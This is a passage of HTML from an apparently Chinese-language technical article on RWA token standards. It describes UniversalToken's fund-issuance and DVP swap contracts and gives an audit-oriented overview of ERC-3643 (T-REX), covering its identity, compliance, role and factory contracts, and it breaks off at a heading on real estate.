SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">5.4 资金发行工具</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">化复杂的分配流程 FundIssuer 合约专门用于基金份额的发行场景。在传统的基金认购流程中，投资者先转入资金，基金管理人根据净值计算应发行的份额，然后分发给投资者。这个流程在链上实现时涉及多个步骤，容易出错。FundIssuer 对以上流程进行周期化发行管理， 采用传统的周期化延迟结算模型(Cycle-Based Settlement)。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">5.5 原子交换与 DVP (Swaps)</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安全的二级市场交易 为了支持安全、去信任的二级市场交易，UniversalToken 库引入了 Swaps 合约，实现了 DVP（券款对付）和原子交换功能。</span></span></p><h2 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">II. 证券型 RWA：ERC-3643 (T-REX) 深度分析</span></span></h2><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1、合约整体架构</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从审计视角看，ERC-3643 的整个架构可以划分为三大核心：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">资产层(Token Contract)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">身份层(Identity Registry)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合规层(Compliance)</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">此外，为了支撑这套复杂系统的部署与升级，T-REX 采用 Proxy-Implementation 代理模式。还引入了工具层，包含工厂(Factory) 合约和权限管理(Roles) 合约。</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2、ERC-3643 (T-REX) 核心合约深度剖析</span></span></h3><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">2.1 核心数据结构详解</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC-3643 的数据结构分散在各个组件中，通过合约地址相互引用，形成一张状态网。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1. Token 合约中的合规指针</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2. IdentityRegistry 中的注册表网络</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3. Compliance 中的模块列表</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">2.2 核心功能模块分析</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1. 转账机制与强制操作</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC-3643 的代币转移流程复写了标准 ERC-20 的 transfer，引入了三道检查。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">冻结检查: 检查 _frozen 和 _frozenTokens。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">跨合约身份与合规验证需同时满足。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合规状态更新(Hook)。</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">以满足法律监管需求（如法院判决执行、私钥丢失恢复），ERC-3643 原生支持强制操作。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">强制转账(Forced Transfer)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">部分冻结(Freeze Partial Tokens)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恢复地址(Recovery Address)</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2. 双重合规检查模块</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;margin-bottom: 24px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Identity Registry 身份验证的核心验证逻辑  isVerified(address _user) 是一个复杂的视图函数，它不验证用户地址，而是验证用户是否有受信任 Issuer 签发的凭证。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3. 模块化合规检查</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ModularCompliance 在代币转移通过 created, destroyed, transferred 三个函数进行状态同步，用于通知所有模块更新内部状态。</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3、扩展合约模块详解</span></span></h3><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">3.1 注册表体系</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC-3643 的灵活性很大程度上归功于注册表的设计。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">TrustedIssuersRegistry 合约为用户维护受信任的 Claim 签发者白名单。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ClaimTopicsRegistry 合约用于管理代币所需的凭证类型（凭证间由 AND 逻辑串联），定义代币所需的准入合规门槛，也是 isVerified 循环的起点。</span></span></p></li></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">3.2 遗留合规模块</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">除了之前模块话的合约 ModularCompliance，代码库中还包含了 Legacy Compliance 体系，主要由 DefaultCompliance 和 BasicCompliance 构成。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">3.3 角色管理模块</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC-3643 的权限体系主要分为系统管理权和业务操作权两类。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Owner（所有者）角色是系统架构主导，负责绑定/解绑 Registry，添加/移除合规 Module 和升级合约实现。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Agent（代理人）角色日常运营者，由 Roles 库维护一个 address 集合。支持 addAgent 和 removeAgent。负责 mint（铸造）、burn（销毁）、forcedTransfer（强制转账）、freeze（冻结）。</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">3.4 工具合约</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为了简化部署和管理，ERC-3643 提供了一套工具链合约。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;margin-bottom: 24px;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">TREXFactory 工厂合约通过 CREATE2 部署，使用 _salt 确保合约地址的确定性。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;margin-bottom: 24px;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">TREXImplementationAuthority（升级管理）， ERC-3643 使用了一种特殊的代理模式。</span></span></p></li></ul><p dir="ltr" style="margin-top: 24px;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">III. 垂直场景与扩展标准简析</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1、房地产 